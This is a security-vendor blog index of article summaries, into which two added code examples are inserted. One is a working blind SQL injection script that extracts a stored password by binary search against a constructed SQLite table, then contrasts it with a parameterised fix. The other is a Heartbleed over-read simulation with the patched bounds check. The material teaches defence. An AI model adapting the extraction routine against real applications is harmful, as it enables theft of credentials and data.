Web Application Security Zone by Netsparker

What is LDAP Injection and How to Prevent It

Category: Web Security Readings - Last Updated: Fri, 13 Mar 2020 - by Zbigniew Banach

LDAP injection attacks exploit input validation vulnerabilities to inject and execute queries against Lightweight Directory Access Protocol (LDAP) servers. LDAP services are crucial for the daily operation of many organizations, and a successful LDAP injection attack can provide valuable information for further attacks on databases and internal applications. This article looks at how LDAP injection works and shows how it can be prevented to improve web application security.

How to Define Cybersecurity Metrics for Web Applications

Category: Web Security Readings - Last Updated: Fri, 06 Mar 2020 - by Zbigniew Banach

Everyone is concerned about information security, data breaches, malware, and cyberattacks, but how do you actually measure an organization’s cybersecurity? How can you quantify the current state of cybersecurity and track improvements? Every cybersecurity program needs carefully defined cybersecurity metrics – performance indicators that provide meaningful and comparable values. This article shows how to define useful cybersecurity metrics, examines the benefits they can bring, and suggests a starter set of metrics for web application security.

Can Vulnerability Scanning Replace Penetration Testing?

Category: Web Security Readings - Last Updated: Fri, 28 Feb 2020 - by Zbigniew Banach

At first glance, penetration testing and vulnerability scanning appear to be two different names for the same basic task: finding vulnerabilities. Under pressure to reduce costs, businesses may be tempted to replace penetration testers with ever-improving vulnerability scanning solutions. In reality, vulnerability scanning and penetration testing are two very different processes, and each is vital to ensure accurate vulnerability assessments and maintain a solid security posture. Let’s have a closer look at both approaches and see how they can be combined to maximize web application security.

How Blind SQL Injection Works

Category: Web Security Readings - Last Updated: Fri, 21 Feb 2020 - by Zbigniew Banach

Blind SQL injection is a type of SQL injection attack where the attacker indirectly discovers information by analyzing server reactions to injected SQL queries, even though injection results are not visible. Blind SQL injection attacks are used against web applications that are vulnerable to SQL injection but don’t directly reveal information. While more time-consuming than regular SQL injection, blind SQL injection attacks can be automated to map out the database structure and extract sensitive information from the database server.
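As an added example that is not code from the Netsparker article, the following runs a boolean-based blind SQL injection end to end: the only thing the attacker gets back from the vulnerable check is whether a row was found, and that single bit is enough to recover a stored secret character by character. The table, its columns and the secret value are constructed for the demo; the injected SQL uses SQLite's `length`, `substr` and `unicode` functions because the demo runs against an in-memory SQLite database.

```python
# Added example (not code from the Netsparker article): boolean-based blind
# SQL injection against a constructed in-memory SQLite table, then the same
# payloads against the parameterised fix.
import sqlite3
from typing import Callable, Tuple

def make_db() -> sqlite3.Connection:
    """Constructed sample data; table, columns and the secret are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "Winter2020"), ("bob", "letmein")])
    return conn

def user_exists_vulnerable(conn: sqlite3.Connection, name: str) -> bool:
    """The injectable check. The caller learns nothing from the query except
    whether a row came back: that one bit is the attacker's oracle."""
    sql = "SELECT 1 FROM users WHERE name = '%s'" % name
    return conn.execute(sql).fetchone() is not None

def user_exists_fixed(conn: sqlite3.Connection, name: str) -> bool:
    """Parameterised: the input can only ever be compared as a string value."""
    return conn.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone() is not None

def extract_password(oracle: Callable[[str], bool], target: str = "admin",
                     max_len: int = 64) -> str:
    """Recover target's password one character at a time. Each character is
    found by binary search over the ASCII range, so about seven yes/no
    answers per character instead of one query per candidate value."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop as soon as there is no character at this position.
        if not oracle("%s' AND length(password) >= %d -- " % (target, pos)):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "%s' AND unicode(substr(password, %d, 1)) > %d -- " % (target, pos, mid)
            if oracle(probe):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered

def demo() -> Tuple[str, str]:
    """Run the extraction against the vulnerable and the fixed check."""
    conn = make_db()
    leaked = extract_password(lambda n: user_exists_vulnerable(conn, n))
    nothing = extract_password(lambda n: user_exists_fixed(conn, n))
    return leaked, nothing

if __name__ == "__main__":
    print(demo())   # ('Winter2020', '')
```

Every probe the attacker sends becomes `SELECT 1 FROM users WHERE name = 'admin' AND unicode(substr(password, N, 1)) > M -- '`, and the trailing quote is swallowed by the comment. Against the parameterised version the same text is just a name nobody has, the first probe returns false and the loop ends with nothing recovered.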

The Challenges of Ensuring IoT Security

Category: Web Security Readings - Last Updated: Fri, 14 Feb 2020 - by Zbigniew Banach

It’s no secret that cybersecurity and the Internet of Things don’t go well together. Thousands of IoT devices are finding their way into homes, businesses, and many other areas of our lives, but security is rarely high on device manufacturers’ list of priorities. With no industry standards for architecture or security, devices often use custom-built operating systems and proprietary communication protocols. Internet of Things security remains a veritable minefield, and problems with IoT cyberattacks and malware can only continue to grow along with the number of devices. So why is it so hard to secure IoT devices, and what can we do about it?

The Heartbleed Bug: How a Forgotten Bounds Check Broke the Internet

Category: Web Security Readings - Last Updated: Fri, 07 Feb 2020 - by Zbigniew Banach

The Heartbleed bug is a critical buffer over-read flaw in several versions of the OpenSSL library that can reveal unencrypted information from the system memory of a server or client running a vulnerable version of OpenSSL. Attacks can reveal highly sensitive data, such as login credentials, TLS private keys, and personal information. Let's take a closer look at one of the most serious and widespread security vulnerabilities in web history and see how just one buggy line of code could wreak havoc across the world.
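The "forgotten bounds check" can be shown without OpenSSL itself. The following is an added example, not OpenSSL's code: a simulation of TLS heartbeat handling in which the record buffer and the "memory" after it are constructed bytes. The vulnerable function does what the pre-fix code did (trust the payload length field in the message), and the fixed one adds the check from the patch, which discards any heartbeat whose claimed payload plus header and padding does not fit in the record actually received. One difference from C is that a Python slice stops at the end of the buffer instead of reading on into whatever follows.

```python
# Added example (not OpenSSL's code): a simulation of the heartbeat length
# handling around the Heartbleed bug, using constructed buffers.
import struct
from typing import Optional, Tuple

HB_REQUEST = 1
PADDING = 16          # RFC 6520: at least 16 bytes of random padding

def build_heartbeat(payload: bytes, claimed_length: int) -> bytes:
    """type(1) | payload_length(2) | payload | padding. A normal peer sets
    claimed_length == len(payload); an attacker sets it far larger."""
    return struct.pack(">BH", HB_REQUEST, claimed_length) + payload + b"\x00" * PADDING

def handle_vulnerable(memory: bytes, record_length: int) -> bytes:
    """Pre-fix logic: take the length from the message and copy that many
    bytes from where the payload starts, never comparing it with
    record_length, the number of bytes actually received."""
    _hbtype, payload_length = struct.unpack_from(">BH", memory, 0)
    return memory[3:3 + payload_length]   # reads past the record into adjacent memory

def handle_fixed(memory: bytes, record_length: int) -> Optional[bytes]:
    """The patch: if header + claimed payload + padding exceeds the received
    record, silently discard the message (RFC 6520 section 4)."""
    _hbtype, payload_length = struct.unpack_from(">BH", memory, 0)
    if 1 + 2 + payload_length + PADDING > record_length:
        return None
    return memory[3:3 + payload_length]

# Constructed stand-in for whatever else was in the process heap next to the
# record: cookies, session data, key material.
ADJACENT_HEAP = b"Cookie: session=9f3c1a77; -----BEGIN RSA PRIVATE KEY-----"

def simulate(claimed_length: int, payload: bytes = b"hi") -> Tuple[bytes, Optional[bytes]]:
    """Return (what the vulnerable code echoes back, what the fixed code does)."""
    record = build_heartbeat(payload, claimed_length)
    memory = record + ADJACENT_HEAP
    return handle_vulnerable(memory, len(record)), handle_fixed(memory, len(record))

if __name__ == "__main__":
    leaked, discarded = simulate(0xFFFF)   # 2-byte field: the attacker asks for 64 KB
    print(leaked)                          # payload, padding, then the adjacent heap
    print(discarded)                       # None
    print(simulate(2))                     # (b'hi', b'hi'): an honest heartbeat
```

With a two-byte length field a single malicious heartbeat can request up to 64 KB per message, and the request can be repeated as often as the attacker likes, which is how credentials and keys were harvested in practice.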

Using a Cybersecurity Framework for Web Application Security

Category: Web Security Readings - Last Updated: Fri, 31 Jan 2020 - by Zbigniew Banach

A cybersecurity framework is a comprehensive set of guidelines that help organizations define cybersecurity policies to assess their security posture and increase resilience in the face of cyberattacks. Cybersecurity frameworks formally define security controls, risk assessment methods, and appropriate safeguards to protect information systems and data from cyberthreats. This article looks at the reasons for using a cybersecurity framework and shows how you can find best-practice cybersecurity processes and actions to apply to web application security.

Announcing the Netsparker Whitepaper: False Positives in Web Application Security – Facing the Challenge

Category: Web Security Readings - Last Updated: Thu, 23 Jan 2020 - by Netsparker Team

The fast pace of modern web application development requires automated tools for vulnerability scanning and management, and false positives in vulnerability scan results can have a serious impact on the performance of security teams. This whitepaper discusses the many problems that false positives can bring all across the organization and shows how Netsparker’s Proof-Based Scanning™ technology can help to restore confidence in automated vulnerability scanning, improve workflow automation and web application security, and achieve real business benefits.

How the BEAST Attack Works

Category: Web Security Readings - Last Updated: Fri, 17 Jan 2020 - by Zbigniew Banach

BEAST, or Browser Exploit Against SSL/TLS, was an attack that allowed a man-in-the-middle attacker to uncover information from an encrypted SSL/TLS 1.0 session by exploiting a known theoretical vulnerability. The threat prompted browser vendors and web server administrators to move to TLS v1.1 or higher and implement additional safeguards. Although no modern web browser remains vulnerable, the BEAST attack shows how a minor theoretical vulnerability can be combined with other weaknesses to craft a practical attack. This article looks at how the BEAST attack worked, why it was possible, and how it was eventually mitigated.

System Hardening for Your Web Applications

Category: Web Security Readings - Last Updated: Tue, 14 Jan 2020 - by Zbigniew Banach

System hardening is the practice of securing a computer system by reducing its attack surface. This includes removing unnecessary services and unused software, closing open network ports, changing default settings, and so on. For web applications, the attack surface is also affected by the configuration of all underlying operating systems, databases, network devices, application servers, and web servers. This article examines approaches to system hardening and shows what security measures you can apply to keep your web applications safe.

CWE/SANS Top 25 Software Errors for 2019

Category: Web Security Readings - Last Updated: Fri, 03 Jan 2020 - by Zbigniew Banach

In September 2019, a new CWE/SANS Top 25 Most Dangerous Software Errors list was published for the first time since 2011. Unlike previous lists, it was calculated by analyzing reported vulnerabilities to determine underlying weaknesses, so it is especially valuable for developers and software security professionals. This article looks at the top-rated software weaknesses and shows how they apply in practice to web application security.

Season's Greetings

Category: Web Security Readings - Last Updated: Tue, 24 Dec 2019 - by Netsparker Team

The entire Netsparker team would like to wish you all the best in the upcoming holiday season. Whether you are celebrating Christmas, Hanukkah, Kwanzaa, Yule, Las Posadas, or simply taking the time off to rest, may you spend it with those who are closest to you.

How DNS Cache Poisoning Attacks Work

Category: Web Security Readings - Last Updated: Fri, 13 Dec 2019 - by Zbigniew Banach

DNS cache poisoning attacks try to fool applications into connecting to a malicious IP address by getting a forged DNS response, carrying a fake address for the requested domain name, accepted into a resolver’s cache, typically by flooding the resolver with guessed responses before the legitimate answer arrives. If the attacker succeeds in planting false data in the cache, the resolver returns the spoofed address for later lookups instead of querying for the real one. As a result, users connect to a malicious site at the address served from the cache. Let’s see why DNS spoofing is possible and how you can mitigate the threat.

Ferruh Mavituna Talks About Building a Realistic Web Security Program on Enterprise Security Weekly #164

Category: Web Security Readings - Last Updated: Tue, 10 Dec 2019 - by Allen Baird

Netsparker CEO Ferruh Mavituna is interviewed on Enterprise Security Weekly about how to start building a realistic web security program in enterprises. He discusses the shift-left approach by which security is built into the application at an earlier stage, and how to reach this stage in a safe, prioritized and persuasive way.

Understanding Reverse Shells

Category: Web Security Readings - Last Updated: Tue, 03 Dec 2019 - by Zbigniew Banach

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the attacker’s host. Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack. Reverse shells can also work across a NAT or firewall. This article explains how reverse shells work in practice and what you can do to prevent them.

Top 10 Cybersecurity Trends to Look Out For in 2020

Category: Web Security Readings - Last Updated: Tue, 19 Nov 2019 - by Zbigniew Banach

2019 has seen cybersecurity issues firmly take their place in the news, both for the technology industry and the general public. While organizations are increasingly aware of the importance of cybersecurity, most are struggling to define and implement the required security measures. In this article, we take a look at 10 cybersecurity trends that are likely to shape the cybersecurity landscape in 2020, from data breaches and IT security staff shortages to security automation and integration.

Red Team Vs Blue Team Testing for Cybersecurity

Category: Web Security Readings - Last Updated: Thu, 14 Nov 2019 - by Zbigniew Banach

Red team versus blue team exercises simulate real-life cyberattacks against organizations to locate weaknesses and improve information security. In this wargaming approach, the red team are the attackers and they attempt to infiltrate an organization’s digital and physical defenses using any attack techniques available to real attackers. The blue team’s job is to detect penetration attempts and prevent exploitation. Red team vs blue team exercises can last several weeks and provide a realistic assessment of an organization’s security posture.

Why Static Code Analysis Is Not Enough to Secure Your Web Applications

Category: Web Security Readings - Last Updated: Thu, 07 Nov 2019 - by Zbigniew Banach

Static code analysis tools are used to automatically check source code for errors and security vulnerabilities, as well as ensure compliance with coding standards. While effective for some classes of vulnerabilities, they have a number of disadvantages and limitations, especially for web applications. Dynamic analysis solutions address many of these problems and can complement or replace static tools. This article looks at some of the shortcomings of static analysis and shows how deploying dynamic analysis tools can help you improve web application security.

XSS Filter Evasion

Category: Web Security Readings - Last Updated: Thu, 24 Oct 2019 - by Zbigniew Banach

XSS filter evasion refers to a variety of methods used by attackers to bypass Cross-Site Scripting filters. Attackers attempting to inject malicious JavaScript into web page code must not only exploit an application vulnerability, but also evade input validation and fool complex browser filters. This article looks at some common approaches to XSS filter evasion and shows what you can do to improve application security.